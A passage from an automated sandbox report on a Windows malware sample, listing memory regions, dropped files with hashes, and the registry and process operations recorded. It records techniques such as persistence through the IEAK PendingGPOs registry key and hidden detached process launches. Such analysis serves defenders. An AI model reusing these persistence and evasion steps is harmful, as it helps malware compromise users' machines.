|
|
|
- |
| combase.dll | 0x74880000 | 0x74a3cfff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x74aa0000 | 0x74b1afff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x74b20000 | 0x74b64fff | Memory Mapped File | rwx |
|
|
|
- |
| windows.storage.dll | 0x74b70000 | 0x75068fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x75070000 | 0x7511cfff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x75120000 | 0x7651efff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x765a0000 | 0x7667ffff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x766e0000 | 0x766eefff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x76b60000 | 0x76bf1fff | Memory Mapped File | rwx |
|
|
|
- |
| wintrust.dll | 0x76c00000 | 0x76c41fff | Memory Mapped File | rwx |
|
|
|
- |
| cfgmgr32.dll | 0x76ec0000 | 0x76ef6fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x76f00000 | 0x7704efff | Memory Mapped File | rwx |
|
|
|
- |
| crypt32.dll | 0x77050000 | 0x771c7fff | Memory Mapped File | rwx |
|
|
|
- |
| ole32.dll | 0x771d0000 | 0x772bafff | Memory Mapped File | rwx |
|
|
|
- |
| psapi.dll | 0x772c0000 | 0x772c5fff | Memory Mapped File | rwx |
|
|
|
- |
| msasn1.dll | 0x772d0000 | 0x772ddfff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x772e0000 | 0x7730afff | Memory Mapped File | rwx |
|
|
|
- |
| clbcatq.dll | 0x77310000 | 0x77393fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x773a0000 | 0x773f7fff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x77400000 | 0x7748cfff | Memory Mapped File | rwx |
|
|
|
- |
| netapi32.dll | 0x77490000 | 0x774a2fff | Memory Mapped File | rwx |
|
|
|
- |
| nsi.dll | 0x774b0000 | 0x774b6fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x774c0000 | 0x7763dfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x77760000 | 0x7776bfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77810000 | 0x77956fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77960000 | 0x77adafff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007feb0000 | 0x7feb0000 | 0x7ffaffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7ffc1562ffff | Private Memory | r |
|
|
|
- |
| ntdll.dll | 0x7ffc15630000 | 0x7ffc157f0fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc157f1000 | 0x7ffc157f1000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
|
For performance reasons, the remaining 14 entries are omitted.
The remaining entries can be found in flog.txt. |
||||||||
Created Files
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| C:\Users\Nd9E1FYi\AppData\Local\Temp\tmp8C77.tmp | 0.00 KB |
MD5:
d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 SSDeep: 3:: |
|
|
| C:\Users\Nd9E1FYi\AppData\Local\Temp\SMSvcHost32.inf | 0.27 KB |
MD5:
f25c271f0546fe0eed669c069bb05704
SHA1: e521751ce40704cafa5411c91dcb93051b7e5957 SHA256: 8eebfec342b27bbbf07b0d8a98e33c8f30641ee825380cd2720fc1bcac6977ac SSDeep: 6:AkAh+BIHgVooT4WY/fWg6Jmfu43mfuX8Phn23fobAd9:Q+BIASL/fOmf/mfb0o49 |
|
|
| C:\Users\Nd9E1FYi\AppData\Local\Temp\SMSvcHost32.inf | 0.29 KB |
MD5:
43a97b98561250a80a6e4796184a2448
SHA1: 8e4834df9c9cfd7ea8e56ceae3eda919562242d4 SHA256: 0d26b62e32131ff929ff0fe92a4e5f47f7072b3450777ba992d149a20c2d6568 SSDeep: 6:AkAh+BIHgVooT4WY/fWg1HVPABHfdCtHVPABHfnhn23fobAd9:Q+BIASL/frHixfd6Hixfco49 |
|
|
| C:\Users\Nd9E1FYi\AppData\Local\Temp\tmp8C77.tmp | 245.50 KB |
MD5:
3cf7a348da34fbb5b7a77f49e6219a76
SHA1: ace28cb17ef956527798c4dc77c50e5559c74cdb SHA256: 1eceed1163da873e4988bd7b232c751a3f7699035e458db2abf8c4483a627409 SSDeep: 6144:22C5kIiyCoHmrokIR7CcGIt11H+9cfKa:2Z5zPGrokIR77FhH+T |
|
|
| C:\Users\Nd9E1FYi\AppData\Local\Temp\SMSvcHost32.inf | 0.32 KB |
MD5:
24f141ab1d24504e4ed2a44d2d01d6d4
SHA1: 8f8a7e2dc9a5f24676e6f446fcd8ab56fa892d1b SHA256: a30f3bbb951c4dff93c903d825d8a1abe70f7a4bdc70e5e1c1f4d942ffc152c0 SSDeep: 6:AkAh+BIHgVooT4WY/fWg50tbI3iU0tbIahn23fobAd9:Q+BIASL/frMuMWo49 |
|
|
| C:\Users\Nd9E1FYi\AppData\Local\Temp\SMSvcHost32.inf | 0.29 KB |
MD5:
680bd3adc61ba11360e5237545ded69b
SHA1: 17b1b994c7a45fb4ad44f2a76060ee601a7e4ddb SHA256: 3725d719d2f2dba93b0acbabc42be908be71ba742123690f8ea3e6142975a89a SSDeep: 6:AkAh+BIHgVooT4WY/fWg574qShBME/T7SQJ4qShBME/SPhn23fobAd9:Q+BIASL/fsj9eQijVo49 |
|
|
| C:\Users\Nd9E1FYi\AppData\Local\Temp\SMSvcHost32.inf | 0.27 KB |
MD5:
d63332b5a8254668fbae1255b085775d
SHA1: 4e82e31ad4e2eff91feec5f3827ed31168da3ca4 SHA256: 66db29d5f893e6629dacd2a8097643fac25e67f707399b0b72e41506c164886b SSDeep: 6:AkAh+BIHgVooT4WY/fWgJDIQlLJobNDHHAIQlLJobNDjPhn23fobAd9:Q+BIASL/fXJobRneJobRj0o49 |
|
|
Host Behavior
File (565)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\Nd9E1FYi\AppData\Local\Temp\SMSvcHost32.exe | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\Nd9E1FYi\AppData\Local\Temp\SMSvcHost32.exe | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\SYSTEM32\ntdll.dll | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
3 | |
| Create | C:\Users\Nd9E1FYi\AppData\Local\Temp\SMSvcHost32.inf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Windows\system32\cmd.exe | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\Nd9E1FYi\AppData\Local\Temp\SMSvcHost32.exe | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\Nd9E1FYi\AppData\Local\Temp\SMSvcHost32.exe | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\Nd9E1FYi\AppData\Local\Temp\tmp8C77.tmp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Windows\system32\cmd.exe | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\Nd9E1FYi\AppData\Local\Temp\SMSvcHost32.inf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Windows\system32\cmd.exe | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create Temp File | C:\Users\Nd9E1FYi\AppData\Local\Temp\tmp8C77.tmp | path = C:\Users\Nd9E1FYi\AppData\Local\Temp\, prefix = tmp |
|
1 | |
| Get Info | C:\Users\Nd9E1FYi\AppData\Local\Temp\SMSvcHost32.exe | type = size |
|
1 | |
| Get Info | C:\Users\All Users\AppData\Local\Temp\uqjckeguhl.tmp | type = file_attributes |
|
4 | |
| Get Info | C:\Users\All Users\Local Settings\Temp\uqjckeguhl.tmp | type = file_attributes |
|
4 | |
| Get Info | C:\Users\Default\AppData\Local\Temp\uqjckeguhl.tmp | type = file_attributes |
|
4 | |
| Get Info | C:\Users\Default\Local Settings\Temp\uqjckeguhl.tmp | type = file_attributes |
|
4 | |
| Get Info | C:\Users\Default User\AppData\Local\Temp\uqjckeguhl.tmp | type = file_attributes |
|
4 | |
| Get Info | C:\Users\Default User\Local Settings\Temp\uqjckeguhl.tmp | type = file_attributes |
|
4 | |
| Get Info | C:\Users\Nd9E1FYi\AppData\Local\Temp\uqjckeguhl.tmp | type = file_attributes |
|
4 | |
| Get Info | C:\Users\Nd9E1FYi\Local Settings\Temp\uqjckeguhl.tmp | type = file_attributes |
|
4 | |
| Get Info | C:\Users\Public\AppData\Local\Temp\uqjckeguhl.tmp | type = file_attributes |
|
4 | |
| Get Info | C:\Users\Public\Local Settings\Temp\uqjckeguhl.tmp | type = file_attributes |
|
4 | |
| Get Info | - | type = time |
|
1 | |
| Get Info | C:\Users\Nd9E1FYi\AppData\Local\Temp\SMSvcHost32.exe | type = size |
|
1 | |
| Get Info | - | type = time |
|
1 | |
| Get Info | - | type = time |
|
1 | |
| Read | C:\Users\Nd9E1FYi\AppData\Local\Temp\SMSvcHost32.exe | size = 512, size_out = 512 |
|
249 | |
| Read | C:\Users\Nd9E1FYi\AppData\Local\Temp\SMSvcHost32.exe | size = 238592, size_out = 238592 |
|
1 | |
| Read | C:\Windows\SYSTEM32\ntdll.dll | size = 4, size_out = 4 |
|
3 | |
| Read | C:\Users\Nd9E1FYi\AppData\Local\Temp\SMSvcHost32.exe | size = 512, size_out = 512 |
|
249 | |
| Read | C:\Users\Nd9E1FYi\AppData\Local\Temp\SMSvcHost32.exe | size = 238592, size_out = 238592 |
|
1 | |
| Write | C:\Users\Nd9E1FYi\AppData\Local\Temp\SMSvcHost32.inf | size = 296 |
|
1 | |
| Write | C:\Users\Nd9E1FYi\AppData\Local\Temp\tmp8C77.tmp | size = 251392 |
|
1 | |
| Write | C:\Users\Nd9E1FYi\AppData\Local\Temp\SMSvcHost32.inf | size = 298 |
|
1 |
Registry (175)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create Key | HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System | - |
|
2 | |
| Create Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion | - |
|
1 | |
| Create Key | HKEY_CURRENT_USER\Software\Microsoft\IEAK\GroupPolicy\PendingGPOs | - |
|
1 | |
| Create Key | HKEY_CURRENT_USER\Software\Microsoft\IEAK\GroupPolicy\PendingGPOs | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Hardware\DESCRIPTION\System\CentralProcessor\0 | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ | - |
|
10 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ | - |
|
10 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\ | - |
|
10 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ | - |
|
10 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ | - |
|
10 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\ | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\ | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\ | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\ | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\ | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Hardware\DESCRIPTION\System\CentralProcessor\0 | value_name = ProcessorNameString, data = 73 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System | value_name = SystemBiosVersion, data = 4411304, type = REG_MULTI_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System | value_name = VideoBiosVersion, data = 71, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion | value_name = SystemBiosVersion, data = 71, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion | value_name = DigitalProductId, data = 164 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion | value_name = InstallDate, data = 63 |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings | value_name = ProxyEnable |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings | value_name = ProxyEnable, data = 0 |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings | value_name = ProxyServer |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings | value_name = ProxyOverride |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings | value_name = AutoConfigURL |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings | value_name = AutoDetect |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ | value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
10 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ | value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
10 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\ | value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
10 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ | value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
10 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ | value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
10 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\IEAK\GroupPolicy\PendingGPOs | value_name = Count, data = 1, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\IEAK\GroupPolicy\PendingGPOs | value_name = Path1, data = C:\Users\Nd9E1FYi\AppData\Local\Temp\SMSvcHost32.inf, size = 104, type = REG_SZ |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\IEAK\GroupPolicy\PendingGPOs | value_name = Section1, data = DefaultInstall, size = 28, type = REG_SZ |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ | value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ | value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\ | value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ | value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ | value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ | value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ | value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\ | value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ | value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ | value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ | value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ | value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\ | value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ | value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ | value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ | value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ | value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\ | value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ | value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ | value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ | value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ | value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\ | value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ | value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ | value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 |
Process (10019)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\Nd9E1FYi\AppData\Local\Temp\SMSvcHost32.exe --vwxyz | os_pid = 0xdb8, creation_flags = CREATE_DETACHED_PROCESS, CREATE_BREAKAWAY_FROM_JOB, CREATE_NO_WINDOW, show_window = SW_HIDE |
|
1 | |
| Create | "C:\Users\Nd9E1FYi\AppData\Local\Temp\tmp8C77.tmp" --reinstall | os_pid = 0xe6c, creation_flags = CREATE_DETACHED_PROCESS, CREATE_BREAKAWAY_FROM_JOB, CREATE_NO_WINDOW, show_window = SW_HIDE |
|
1 | |
| Open | c:\windows\system32\smss.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
171 | |
| Open | c:\windows\system32\csrss.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
171 | |
| Open | c:\windows\system32\wininit.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
171 | |
| Open | c:\windows\system32\csrss.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
171 | |
| Open | c:\windows\system32\winlogon.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
171 | |
| Open | c:\windows\system32\services.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
171 | |
| Open | c:\windows\system32\lsass.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
171 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
171 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
171 | |
| Open | c:\windows\system32\dwm.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
171 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
171 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
171 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
171 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
171 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
171 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
171 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
171 | |
| Open | c:\windows\system32\spoolsv.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
171 | |
| Open | c:\windows\system32\sihost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
171 | |
| Open | c:\program files\common files\microsoft shared\clicktorun\officeclicktorun.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
171 | |
| Open | c:\windows\system32\runtimebroker.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
171 | |
| Open | c:\windows\system32\taskhostw.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\explorer.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windowsapps\microsoft.messaging_1.10.22012.0_x86__8wekyb3d8bbwe\skypehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\systemapps\shellexperiencehost_cw5n1h2txyewy\shellexperiencehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\systemapps\microsoft.windows.cortana_cw5n1h2txyewy\searchui.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\dllhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\audiodg.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
170 | |
| Open | c:\program files\windowsapps\microsoft.messaging_1.10.22012.0_x86__8wekyb3d8bbwe\skypehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\backgroundtaskhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\taskhostw.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
170 | |
| Open | c:\program files\uninstall information\develop-patent.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\common files\its.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\internet explorer\gently budapest.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\windows sidebar\thoroughlypriestprefix.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
